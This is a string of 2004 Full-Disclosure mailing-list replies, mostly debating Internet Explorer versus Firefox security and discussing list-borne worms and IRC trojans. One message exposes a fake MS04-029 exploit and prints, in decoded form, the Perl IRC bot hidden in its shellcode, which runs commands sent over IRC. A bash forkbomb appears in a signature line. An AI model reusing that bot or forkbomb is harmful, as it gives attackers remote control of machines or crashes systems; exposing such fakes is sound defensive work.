Well, I didn't say it was their Legal position..and they was just their cope out...they know they made it embedded and they know it doesn't have to be embedded... Do you truthly believe the MS legel position? ;) -Original Message- From: Gary E. Miller [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 16, 2004 1:09 PM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yo Todd! On Tue, 16 Nov 2004, Todd Towles wrote: IE isn't part of the OS in Microsoft mind...but it is in the customers. I suggest you re-read about the M$ anti-trust trial. This was certainly NOT the M$ legal positiion. RGDS GARY - -- - Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701 [EMAIL PROTECTED] Tel:+1(541)382-8588 Fax: +1(541)382-8676 -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.3 (GNU/Linux) iD8DBQFBmlBX8KZibdeR3qURAokiAJ0Q6tyaHXCr2/pNVH9MicVbDtXwCwCcDL2b Qba6K7u6t/bsgjmTZP7zRc4= =3ULA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
What do you think? http://www.usdoj.gov/opa/pr/2004/October/04_crm_726.htm We all knew they were doing fake IDs and the such..it was only time. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Tuesday, November 16, 2004 10:59 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] controversial shadowcrew site hacked by secret service? The site which was hosting services, like bombs, fake ID and other terrorist stuff is now showing a defacement or replacement page showing words from the intelligence services. http://www.shadowcrew.com Is this fake or real? Who knows.. Thanks, n3td3v http://www.geocities.com/n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
And what do you plan on doing about the unpatched exploited recently released? There are holes for SP2...ones that haven't even been released yet... From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Rafel Ivgi, The-InsiderSent: Friday, November 12, 2004 12:44 AMTo: [EMAIL PROTECTED]Subject: Re: [Full-Disclosure] IE is just as safe as FireFox That is incorrect, there is a fix -- SP2.Users should use the latest updated system, meaning if there is an SP2, they should install it.Rafel Ivgi, The-InsiderSecurity ConsultantMalicious Code Research Center (MCRC)Finjan Software LTDE-mail: [EMAIL PROTECTED]-Prevention is the best cure!- Original Message - From: "Martin Mkrtchian" [EMAIL PROTECTED]To: "Todd Towles" [EMAIL PROTECTED]Cc: "Mailing List - Full-Disclosure" [EMAIL PROTECTED]; [EMAIL PROTECTED]Sent: Friday, November 12, 2004 3:03 AMSubject: Re: [Full-Disclosure] IE is just as safe as FireFox They should've at least released that statement after they fixed the IE FRAME vulnerability. 0 day exploit is in the wild and no fix for it, yet they claim its secure enough. If the programmers are as smart as the company press releasers, I can see why I.E. still sux. Martin On Thu, 11 Nov 2004 15:59:20 -0600, Todd Towles [EMAIL PROTECTED] wrote: Microsoft's security and mangement product manager (Ben English) says... At a security roundtable discussion in Sydney on Thursday, Ben English, Microsoft's security and management product manager, told attendees that IE undergoes "rigorous code reviews" and is no less secure than any other browser. "Because IE is ubiquitous, you hear a lot more about it, but I don't think that Internet Explorer is any less secure than any other browser out there," English said. http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/2100-1032_ 3-5448719.html?part=dhttag=ntoptag=nl.e433 Can anyone say IFRAME? Lol -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
The first patch for ADODB.stream was just a killbit..and the killbit only stopped the current attack vector...in a manner of seconds, there was a second exploit that passed the so called first patch. Stupid, they think everything is as stupid as their main market. The problem with IE is its connection to the OS...if you break IE you break the OS...Microsoft can't clean up the browser without breaking the OS...then they would have to do a complete secure rebuild. Ohhh..we wouldn't want to do that..lol -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Des Ward Sent: Friday, November 12, 2004 2:39 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE is just as safe as FireFox Other browsers may have problems, and often do (In the case of Firefox say) but the time to respond is key here. MS have a real problem going that extra mile when it comes to patching against variants of a vulnerability (ADODB.stream, shell: etc). Mosl software has vulnerabilities at some stage, it's how you deal with it. -Original Message- From: Todd Towles [EMAIL PROTECTED] Date: Thu, 11 Nov 2004 15:59:20 To:Mailing List - Full-Disclosure [EMAIL PROTECTED] Cc:[EMAIL PROTECTED] Subject: [Full-Disclosure] IE is just as safe as FireFox Microsoft's security and mangement product manager (Ben English) says... At a security roundtable discussion in Sydney on Thursday, Ben English, Microsoft's security and management product manager, told attendees that IE undergoes rigorous code reviews and is no less secure than any other browser. Because IE is ubiquitous, you hear a lot more about it, but I don't think that Internet Explorer is any less secure than any other browser out there, English said. http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/ 2100-1032_ 3-5448719.html?part=dhttag=ntoptag=nl.e433 Can anyone say IFRAME? Lol -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html --- Sent via XDAII BlackBerry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
He can buy a product..or do a super fast rollout of SP2..but why should he? Microsoft should write better products...period. Everytime a Firefox exploit comes out..there is already a fix...is that magic? No..it is good coding... -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Rafel Ivgi, The-Insider Sent: Friday, November 12, 2004 8:09 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE is just as safe as FireFox If you do have 14000 machines why don't you buy Finjan's Vital Security For Web? It will filter all malicious I.E exploits for all its surfers(its a proxy, quite fast...) Or just use SUS(system update server (microsoft)) just like any other administrator... to install sp2 or to just replace the c:\windows\system32\shdocvw.dll with the patched one or with sp2 one... Rafel Ivgi, The-Insider Security Consultant Malicious Code Research Center (MCRC) Finjan Software LTD E-mail: [EMAIL PROTECTED] - Prevention is the best cure! - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, November 12, 2004 12:46 PM Subject: Re: [Full-Disclosure] IE is just as safe as FireFox Oh yeah, I've got 14,000 Windows 2000 machines to update to windows XP SP2, hang on wheres that CD? So thanks for your infinate wisdom there Rafel. Colin. Rafel Ivgi, The-Insider [EMAIL PROTECTED] To et.il[EMAIL PROTECTED] Sent by: cc full-disclosure-a [EMAIL PROTECTED] Subject .com Re: [Full-Disclosure] IE is just as safe as FireFox 12/11/2004 06:44 That is incorrect, there is a fix -- SP2. Users should use the latest updated system, meaning if there is an SP2, they should install it. Rafel Ivgi, The-Insider Security Consultant Malicious Code Research Center (MCRC) Finjan Software LTD E-mail: [EMAIL PROTECTED] - Prevention is the best cure! - Original Message - From: Martin Mkrtchian [EMAIL PROTECTED] To: Todd Towles [EMAIL PROTECTED] Cc: Mailing List - Full-Disclosure [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Friday, November 12, 2004 3:03 AM Subject: Re: [Full-Disclosure] IE is just as safe as FireFox They should've at least released that statement after they fixed the IE FRAME vulnerability. 0 day exploit is in the wild and no fix for it, yet they claim its secure enough. If the programmers are as smart as the company press releasers, I can see why I.E. still sux. Martin On Thu, 11 Nov 2004 15:59:20 -0600, Todd Towles [EMAIL PROTECTED] wrote: Microsoft's security and mangement product manager (Ben English) says... At a security roundtable discussion in Sydney on Thursday, Ben English, Microsoft's security and management product manager, told attendees that IE undergoes rigorous code reviews and is no less secure than any other browser. Because IE is ubiquitous, you hear a lot more about it, but I don't think that Internet Explorer is any less secure than any other browser out there, English said. http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/ 2100-1032_ 3-5448719.html?part=dhttag=ntoptag=nl.e433 Can anyone say IFRAME? Lol -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good
RE: [Full-Disclosure] dab@heise.de
Expect POC exploits, active internet worms, e-mail trojans, bad words and off topic messages...expect everything, trust nothing...Welcome to FD, enjoy your stay =) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jeff Donahue Sent: Friday, November 12, 2004 9:45 AM To: [EMAIL PROTECTED]; Stephen Hunt Subject: Re: [Full-Disclosure] [EMAIL PROTECTED] Obviously this is usual, because the list is unmoderated... Either get a good AV or keep from clicking the executable attachments. ;) - Original Message - From: Stephen Hunt [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, November 11, 2004 5:35 PM Subject: [Full-Disclosure] [EMAIL PROTECTED] Wow, 2nd day on this list and already a windows worm sent to it. Is this a regular occurrence? -Steve ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
Use SUS to install XP SP2 to 14,000 Windows 2000 machines? Somehow I think that will be problematic. Don't forget you have to be on a certain service pack to use SUS for Windows 2000, then change GPO to push the AU changes to each machine to even use SUS..and if you are a admin access, it isn't totally slient. Explain that to non-geek users. Since SUS is free, you can what you pay for...since it over and over again. Replace the SHDOCVW.DLL with the XP SP2 version? On Windows 2000 machines? And what about the practical problems getting round Windows File Protection? On 14,000 machines? Do you want to come in here and try what you suggest? SP2 breaks stuff..we all forget so fast. Compaines have old apps and some will be broken by SP2, but of course Microsoft will only release post-SP2 IE fixes..so they tell us to not rush SP2 and then only release updates for post-SP2. Great...good job. Ohh..and the handing of the GDI exploit..that was worthy of a billion dollar company. -Todd Rafel Ivgi, The-Insider [EMAIL PROTECTED] To et.il [EMAIL PROTECTED], [EMAIL PROTECTED] 12/11/2004 14:08 cc Subject Re: [Full-Disclosure] IE is just as safe as FireFox If you do have 14000 machines why don't you buy Finjan's Vital Security For Web? It will filter all malicious I.E exploits for all its surfers(its a proxy, quite fast...) Or just use SUS(system update server (microsoft)) just like any other administrator... to install sp2 or to just replace the c:\windows\system32\shdocvw.dll with the patched one or with sp2 one... Rafel Ivgi, The-Insider Security Consultant Malicious Code Research Center (MCRC) Finjan Software LTD E-mail: [EMAIL PROTECTED] - Prevention is the best cure! - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, November 12, 2004 12:46 PM Subject: Re: [Full-Disclosure] IE is just as safe as FireFox Oh yeah, I've got 14,000 Windows 2000 machines to update to windows XP SP2, hang on wheres that CD? So thanks for your infinate wisdom there Rafel. Colin. Rafel Ivgi, The-Insider [EMAIL PROTECTED] To et.il[EMAIL PROTECTED] Sent by: cc full-disclosure-a [EMAIL PROTECTED] Subject .com Re: [Full-Disclosure] IE is just as safe as FireFox 12/11/2004 06:44 That is incorrect, there is a fix -- SP2. Users should use the latest updated system, meaning if there is an SP2, they should install it. Rafel Ivgi, The-Insider Security Consultant Malicious Code Research Center (MCRC) Finjan Software LTD E-mail: [EMAIL PROTECTED] - Prevention is the best cure! - Original Message - From: Martin Mkrtchian [EMAIL PROTECTED] To: Todd Towles [EMAIL PROTECTED] Cc: Mailing List - Full-Disclosure [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Friday, November 12, 2004 3:03 AM Subject: Re: [Full-Disclosure] IE is just as safe as FireFox They should've at least released that statement after they fixed the IE FRAME vulnerability. 0 day exploit is in the wild and no fix for it, yet they claim its secure enough. If the programmers are as smart as the company press releasers, I can see why I.E. still sux. Martin On Thu, 11 Nov 2004 15:59:20 -0600, Todd Towles [EMAIL PROTECTED] wrote: Microsoft's security and mangement product manager (Ben English) says... At a security roundtable discussion in Sydney on Thursday, Ben English, Microsoft's security and management product manager, told attendees that IE undergoes rigorous code
RE: [Full-Disclosure] IE is just as safe as FireFox
I don't know about you Rafel, but I know people in your company think XP SP2 is full of holes also. =) Ten new security holes in Windows XP Service Pack 2 have been discovered, so get ready to insert new patches into your patch management schedule. Microsoft recently announced their Security Bulletin Advance Notification Program, which gives administrators a several days advance notice of upcoming patches, however these new security holes were announced by security product maker Finjan Software. http://www.winnetmag.com/Windows/Article/ArticleID/44502/Windows_44502.h tml Great ten more patches they won't released for Windows XP Gold or Windows 2000 I think the founder of Finjan is speaking my language as well... Shlomo Touboul, CEO and Founder of Finjan Software, said Windows XP SP2 operating system is a continuation of the same Windows XP Operating System and Windows Kernel. All Windows versions have been developed with requirements for highest backward compatibility and open architecture, with maximum productivity and ease of use. In addition, Windows applications typically run with administrative permission with full and unlimited access to computer resources. Sound familiar? -Todd Rafel Ivgi, The-Insider Security Consultant Malicious Code Research Center (MCRC) Finjan Software LTD E-mail: [EMAIL PROTECTED] - Prevention is the best cure! - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, November 12, 2004 12:46 PM Subject: Re: [Full-Disclosure] IE is just as safe as FireFox Oh yeah, I've got 14,000 Windows 2000 machines to update to windows XP SP2, hang on wheres that CD? So thanks for your infinate wisdom there Rafel. Colin. Rafel Ivgi, The-Insider [EMAIL PROTECTED] To et.il[EMAIL PROTECTED] Sent by: cc full-disclosure-a [EMAIL PROTECTED] Subject .com Re: [Full-Disclosure] IE is just as safe as FireFox 12/11/2004 06:44 That is incorrect, there is a fix -- SP2. Users should use the latest updated system, meaning if there is an SP2, they should install it. Rafel Ivgi, The-Insider Security Consultant Malicious Code Research Center (MCRC) Finjan Software LTD E-mail: [EMAIL PROTECTED] - Prevention is the best cure! - Original Message - From: Martin Mkrtchian [EMAIL PROTECTED] To: Todd Towles [EMAIL PROTECTED] Cc: Mailing List - Full-Disclosure [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Friday, November 12, 2004 3:03 AM Subject: Re: [Full-Disclosure] IE is just as safe as FireFox They should've at least released that statement after they fixed the IE FRAME vulnerability. 0 day exploit is in the wild and no fix for it, yet they claim its secure enough. If the programmers are as smart as the company press releasers, I can see why I.E. still sux. Martin On Thu, 11 Nov 2004 15:59:20 -0600, Todd Towles [EMAIL PROTECTED] wrote: Microsoft's security and mangement product manager (Ben English) says... At a security roundtable discussion in Sydney on Thursday, Ben English, Microsoft's security and management product manager, told attendees that IE undergoes rigorous code reviews and is no less secure than any other browser. Because IE is ubiquitous, you hear a lot more about it, but I don't think that Internet Explorer is any less secure than any other browser out there, English said. http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/ 2100-1032_ 3-5448719.html?part=dhttag=ntoptag=nl.e433 Can anyone say IFRAME? Lol -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound
RE: [Full-Disclosure] Moox firefox/thunderbird builds. Anyone looked at these yet?
Subseven had a backdoor in it for years
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
Michal Zalewski
Sent: Thursday, November 11, 2004 9:15 AM
To: TK-421
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Moox firefox/thunderbird
builds. Anyone looked at these yet?
On Thu, 11 Nov 2004, TK-421 wrote:
Yes, but because it's open source, you know that thousands
of eyes are
looking at it daily. Especially in larger projects like
Mozilla/Firefox.
Riight, 220 MB of sources. On a daily basis, just how many
people with source code audit experience are desperate enough
to download this and look at more than a couple of files?
This does not work as advertised, quite simply; a well placed
backdoor is indistinguishable from an unintentional security
flaw, and unintentional security flaws can thrive in open
source code for years or decades before being spotted.
--
- bash$ :(){ :|:};: -- Michal
Zalewski * [http://lcamtuf.coredump.cx]
Did you know that clones never use mirrors?
--- 2004-11-11 16:12 --
http://lcamtuf.coredump.cx/photo/current/
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] OT - Re: U.S. 2004 Election Fraud.
But please continue your finger pointing and pointless fighting in private. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Exibar Sent: Thursday, November 11, 2004 9:50 AM To: mike lieman; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Re: U.S. 2004 Election Fraud. - Original Message - From: mike lieman [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, November 11, 2004 9:11 AM Subject: [Full-Disclosure] Re: U.S. 2004 Election Fraud. It all boils down to this, without regard for with side you cheer for. If you can't PROVE your candidate won, with the same certainty that you and your bank can PROVE you checking account balance, you might as well just stay home and screw the wife. At least you'll have some fun. Let me challenge EVERYONE out there... YOUR VOTE DID NOT COUNT. And if you contend otherwise, PROVE IT. Let me challenge YOU. Prove that my vote did not count. Show me absolute, proof beyond a doubt that my vote did not count. If you cannot prove that my vote did not count, then you STFU. Exibar ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] IE is just as safe as FireFox
Microsoft's security and mangement product manager (Ben English) says... At a security roundtable discussion in Sydney on Thursday, Ben English, Microsoft's security and management product manager, told attendees that IE undergoes rigorous code reviews and is no less secure than any other browser. Because IE is ubiquitous, you hear a lot more about it, but I don't think that Internet Explorer is any less secure than any other browser out there, English said. http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/2100-1032_ 3-5448719.html?part=dhttag=ntoptag=nl.e433 Can anyone say IFRAME? Lol -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
Who are you to question him about whom he can question? LOL Can't we all just get along? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of David Maynor Sent: Wednesday, November 03, 2004 2:36 PM To: Cryptochrome Cc: KF_lists; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Slightly off-topic: www.georgewbush.com Who are you to question him. On Wed, 3 Nov 2004 20:31:44 +0100, Cryptochrome [EMAIL PROTECTED] wrote: NOW go away! May I ask: Who are you to tell people to go away? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
Yep, Dave pointed that out really fast...
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
Barrie Dempster
Sent: Wednesday, November 03, 2004 3:19 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
Excellent exploit, I'm sure no one will spot that perl IRC
bot in there, nope no one will see that...
(hint for the readers, try looking at the ascii out put of
the char *shellcode_payload= data, looks a little like the
following)
[code]
#!/usr/bin/perl
$c
han=#0x;$nick=k
;$server=ir3ip.n
et;$SIG{TERM}={};
exit if fork;use I
O::Socket;$sock =
IO::Socket::INET-
new($server.:6667
)||exit;print $so
ck USER k +i k :k
v1\nNICK k\n;$i=1
;while($sock=~/^
[^ ]+ ([^ ]+) /){$
mode=$1;last if $m
ode==001;if($mod
e==433){$i++;$ni
ck=~s/\d*$/$i/;pri
nt $sock NICK $ni
ck\n;}}print $soc
k JOIN $chan\nPRI
VMSG $chan :Hi\n;
while($sock){if
(/^PING (.*)$/){pr
int $sock PONG $1
\nJOIN $chan\n;}i
f(s/^[^ ]+ PRIVMSG
$chan :$nick[^ :\
w]*:[^ :\w]* (.*)$
/$1/){s/\s*$//;$_=
`$_`;foreach(split
\n){print $sock
PRIVMSG $chan :$
_\n;sleep 1;}}}#/
tmp/hi
[/code]
--
Barrie Dempster (zeedo) - Fortiter et Strenue
http://www.bsrf.org.uk
[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
I read a article about how the site got hacked into...recently. Did anyone else read this? If it was hacked then because this is a reaction security measure and not a we want to keep all non-amercians from seeing our stuff. I would guess it is a security measure has it is easy to see mirrors of it outside the country. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever Sent: Friday, October 29, 2004 5:47 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Slightly off-topic: www.georgewbush.com Hi all, Want to view www.georgewbush.com from outside the US? You can't: Access denied. This security measure (!?) can easily be avoided using a proxy in the US or any anonymous surfing website though. So, what is it he doesn't want anyone from outside the US to read ? Cheers, SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [SPAM] Fw: [Full-Disclosure] Joke.cpl ???
We have had this talk on FD before...just search for AV Naming in the archivesfun stuff. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Hugo van der Kooij Sent: Friday, October 29, 2004 7:54 AM To: [EMAIL PROTECTED] Subject: Re: [SPAM] Fw: [Full-Disclosure] Joke.cpl ??? On Fri, 29 Oct 2004, Daniel Bachfeld wrote: So far we have Bagle AQ, AT, AU, AY and BB for the same worm More proposals? This is the biggest divergence i've seen the last months. Is there any reason, why the vendors could not agree on one name? We already have CVE-entries and Bugtraq-IDs for vulnerabilities. So far I noticed at least two distinct files which were detected as W32/[EMAIL PROTECTED] (F-Prot) or Worm.Bagle.AT (ClamAV). Now I get freash trash Which is decoded as W32/[EMAIL PROTECTED] (F-Prot) or Worm.Bagle.AX (ClamAV). I am under the impression it is not a single infection. But I share your sense of utter confusion. To which the people of ClamAV have contributed way too much. (Noticed their 'SomeFool'series?) Hugo. -- I hate duplicates. Just reply to the relevant mailinglist. [EMAIL PROTECTED] http://hvdkooij.xs4all.nl/ Don't meddle in the affairs of magicians, for they are subtle and quick to anger. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Gmail Accounts Vulnerable to XSS Exploit
Slashdot.org "A security hole in GMail has been found (an XSS vulnerability) which allows access to user accounts without authentication. What makes the exploit worse is the fact that changing passwords doesn't help. The full details of the exploit haven't been disclosed. The vulnerability was reported by Israeli news site Nana. They were tipped off by an Israeli hacker. Google has been notified and they are working to close the hole. The Register has the story here."
RE: [Full-Disclosure] Re: getting administrator rights on win2003 machine?
Request like that will get you kicked out of other groups. Yet the request was fill quickly, even without the requester pretending to be a Security Professional -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Andrew Poodle Sent: Thursday, October 28, 2004 9:40 AM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Re: getting administrator rights on win2003 machine? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Random Letters Sent: 28 October 2004 15:17 To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Re: getting administrator rights on win2003 machine? snip This list is for people who try to prevent break-ins - I'll bet that no-one here will help you. While I was going to agree with you.. Someone has already provided help onlist... Shame really.. I almost laughed at the request.. But was a little surprised to see help offered almost immediately a I'm at a boarding school in germany and we have a kind of internet terminal there with win2003 running on the computers. My question is: Is there a way of getting administrative privileges ? I used a RPC Exploit before but now the computers are patched. How do I get a administrator account now?? I have physikal access to the computers. Greetings valentin - germany _ It's fast, it's easy and it's free. Get MSN Messenger today! http://www.msn.co.uk/messenger ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] RE: Full-Disclosure digest
Maybe because they are e-mail borne and if you haven't noticed, you post on here via e-mail? This list is open, therefore as long as people don't fix their computers, you will get viruses. Welcome to FD =) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of digitalchaos Sent: Friday, September 03, 2004 4:27 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] RE: Full-Disclosure digest Why are there virus being transmitted through this newsgroup?? OUTPUT FROM MCAFEE: ** McAfee VirusScan *** Alert generated at: Thu, 02 Sep 2004 13:15:00 -0500 * * McAfee VirusScan has detected a potential threat in this e-mail sent by [EMAIL PROTECTED] The following actions were attempted on each suspicious part. We strongly recommend that you report this virus-related activity to [EMAIL PROTECTED] The attachment E-mail body is infected with the W32/[EMAIL PROTECTED] Virus(es). This attachment has been quarantined. This is not the only message I have received like this Some were infected by NETSKY, various zip/pif virus, and such. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Friday, October 22, 2004 9:24 AM To: [EMAIL PROTECTED] Subject: Full-Disclosure digest, Vol 1 #1996 - 8 msgs ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Virus/Trojan trying to connect external:445 and 212.175.149.149.6667
Sounds like a IRC trojan that is trying to spread via network shares (maybe weak passwords). 6667 is the IRC port, so it looks like it needs that for command and control. Can you get a copy of it? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Murat Bicer Sent: Friday, October 22, 2004 3:39 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] Virus/Trojan trying to connect external:445 and 212.175.149.149.6667 Hi All, I am seeing some network traffic for some windows host trying to contact random remote hosts port 445 and these hosts also try to connect 212.175.149.149.6667 Is this some kind of an IRC bot/trojan? Anybody aware of it? We cannot find anything with the virus scanner. This virus is very chatty, and keeping the network very busy. Any suggestions? Best, Murat ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [SPAM] RE: [Full-Disclosure] interesting trojan found
I see. For some reason, I was thinking he couldn't see it in systemprocess, but now that I think about it, you are correct. So it was hiding but not very well, therefore not the true trojan/rootkit hybrid. Thanks Peter. -Original Message- From: Peter Kruse [mailto:[EMAIL PROTECTED] Sent: Thursday, October 21, 2004 11:33 AM To: Todd Towles; [EMAIL PROTECTED] Subject: SV: [SPAM] RE: [Full-Disclosure] interesting trojan found Hi Todd, But if it is a rootkit, does it not hide from normal AV scanning? Nope, you'll see it in the systemprocess, but since it's active in memory, you won't be able to end it. The trojan is a RDBot variant (Spybot). Like other variants, from this string, it spreads across local and remote networks. It's uses several exploits to compromise unpactched MS Windows boxs, as well as searches for shares with weak passwords. When executed, it creates a mutex [rxBot v0.6.5 pk + ftpd]. If another instance of this worm is already running, it will exit. The malware carries a backdoor that allows a malicious user to control the infected host through IRC channels. As stated in the first posting, it droppes a copy of itself to the windows system folder. Nextup it modifies registry with several runas keys under the value update run msword. This RDbot includes a keylogger, that will log all keyboard activity and save this to a text file. A remote user can collect this information through IRC and possibly gain access to others services. --- Med venlig hilsen // Kind regards Peter Kruse,Voice: (+45) 88136030 Security- and virusanalyst, Cel(+45) 28490532 CSIS ApSFax(+45) 28176030 http://www.csis.dk E-mail [EMAIL PROTECTED] PGP fingerprint 79FD 0648 158E 6B9E 236F CFDA 7C58 64D6 BE83 FA60 